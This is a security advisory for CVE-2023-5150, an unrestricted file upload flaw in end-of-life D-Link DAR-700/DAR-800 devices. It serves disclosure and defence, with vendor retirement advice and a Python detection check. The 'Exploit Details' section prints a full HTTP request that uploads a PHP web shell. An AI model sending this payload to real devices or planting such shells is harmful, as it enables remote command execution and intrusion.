Summary: A critical vulnerability, identified as CVE-2023-5150, has been found in D-Link DAR-700 and DAR-800 devices up to version 20151231. It affects an unknown function in the /useratte/web.php file and allows unrestricted file uploads through manipulation of the file_upload argument. This vulnerability only affects products that are no longer supported by the maintainer. The vendor confirmed that these devices are end-of-life and should be retired and replaced.

Introduction

The Exploit Database Advisory team recently discovered a critical vulnerability in D-Link DAR-700 and DAR-800 devices with software versions up to 20151231. The vulnerability, tracked as CVE-2023-5150, has also been assigned the identifier VDB-240246. It affects an unknown function in the file /useratte/web.php and permits attackers to perform an unrestricted file upload by manipulating the file_upload argument.

Exploit Details

The vulnerability allows attackers to upload arbitrary files and execute commands on the affected devices, and the attack can be launched remotely.

Here is a code snippet illustrating the vulnerability:

```http
POST /useratte/web.php HTTP/1.1
Host: target
Content-Type: multipart/form-data; boundary=----x
Content-Length: 200
Connection: close

------x
Content-Disposition: form-data; name="file_upload"; filename="shell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST["cmd"]); ?>
------x--
```

By exploiting this vulnerability, malicious actors can potentially gain unauthorized access to sensitive information, compromise the network, and execute commands remotely on affected devices.
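For devices that are still in place while replacement is arranged, a request captured in front of the device (reverse proxy, IDS, packet capture) can be checked for the pattern described above. The following is an added example, not code from the advisory or from D-Link: the function name, the extension list and the sample request are assumptions constructed for illustration.

```python
import re
from email.parser import BytesParser
from email.policy import default
from urllib.parse import unquote

TARGET_PATH = "/useratte/web.php"  # endpoint named in the advisory
TARGET_FIELD = "file_upload"       # argument named in the advisory
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")  # assumption: tune locally

def inspect_request(raw: bytes) -> list[str]:
    """Return findings for one captured HTTP request (CRLF or LF line ends)."""
    head, _, body = raw.replace(b"\r\n", b"\n").partition(b"\n\n")
    request_line, _, headers = head.partition(b"\n")
    m = re.match(rb"(\S+) (\S+) HTTP/\d\.\d$", request_line)
    if not m or m.group(1) != b"POST":
        return []
    # Drop the query string, then undo percent-encoding and case tricks.
    path = unquote(m.group(2).decode("latin-1").split("?", 1)[0]).lower()
    if path != TARGET_PATH:
        return []
    # HTTP multipart bodies use MIME syntax, so the stdlib MIME parser applies.
    msg = BytesParser(policy=default).parsebytes(headers + b"\n\n" + body)
    findings = []
    if not msg.is_multipart():
        return findings
    for part in msg.iter_parts():
        if part.get_param("name", header="content-disposition") != TARGET_FIELD:
            continue
        filename = (part.get_filename() or "").lower()
        payload = part.get_payload(decode=True) or b""
        if filename.endswith(SCRIPT_EXTS):
            findings.append(f"script extension in upload: {filename}")
        if b"<?php" in payload.lower():
            findings.append("PHP open tag in uploaded content")
    return findings

SAMPLE_FLAGGED = (  # constructed sample with a harmless payload
    b"POST /useratte/web.php HTTP/1.1\r\nHost: device.example\r\n"
    b"Content-Type: multipart/form-data; boundary=----x\r\n\r\n"
    b"------x\r\n"
    b'Content-Disposition: form-data; name="file_upload"; filename="probe.PHP"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"<?php echo 1; ?>\r\n------x--\r\n"
)

if __name__ == "__main__":
    print(inspect_request(SAMPLE_FLAGGED))
```

Because the devices will not receive a patch, a hit from this check is a signal to isolate the device, not a substitute for retiring it.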

References

- Original Advisory: Exploit Database VDB-240246
- Mitigation: The vendor, D-Link, was contacted regarding the vulnerability and they confirmed that the affected devices (DAR-700 and DAR-800) have reached their end-of-life (EOL). As a result, no patches will be provided for these devices and they should be retired and replaced with newer, supported models.

Conclusion

D-Link DAR-700 and DAR-800 devices are no longer supported and are susceptible to CVE-2023-5150, a critical vulnerability that permits unrestricted file uploads and remote execution. It is strongly recommended that affected users retire the devices and replace them with newer models that are still supported by the vendor.

*Note: This post discusses a vulnerability in devices that are no longer supported by their manufacturer. The information provided should be used solely for educational purposes. Any misuse of the information may result in legal consequences. Always ensure that your networks and devices are updated regularly and are using the latest security measures.*

Timeline

Published on: 09/25/2023 02:15:10 UTC
Last modified on: 11/07/2023 04:23:32 UTC